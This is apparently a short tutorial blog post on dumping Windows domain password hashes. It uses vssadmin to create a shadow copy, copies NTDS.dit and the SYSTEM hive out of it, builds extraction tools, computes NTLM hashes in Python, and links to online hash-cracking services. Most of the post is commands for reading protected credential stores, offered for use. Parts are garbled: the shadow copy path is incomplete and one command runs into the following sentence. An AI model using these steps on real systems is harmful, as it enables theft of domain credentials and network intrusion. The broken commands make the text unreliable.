One of the most reliable ways to gather system hashes is to use vsssadmin to create a shadow and copy of the system drive and then copy the files from them. These files typically are locked and protected by the system and so recovering them from the backup is among the easiest methods. The caveat here that you must be an administrator.
Step 1: Gather the data
run cmd as administrator
vssadmin list shadows
vssadmin create shadow /For=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\System32\config\SYSTEM C:\
Step 2: Installing the tools
We are going to need some tools
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.shI know I usually want to perform a sanity check to make sure I am getting the right hash. The quickest might be to use a snippet of python to check.
import hashlib,binascii
hash = hashlib.new('md4', "thisismyhashvalue".encode('utf-16le')).digest()
print binascii.hexlify(hash)- https://hashc.co.uk/
- https://github.com/libyal/libesedb/wiki/Building
- http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
- http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_3_beta.zip
- https://hashkiller.co.uk/ntlm-decrypter.aspx
- https://gpuhash.me/
- https://TMTO.org
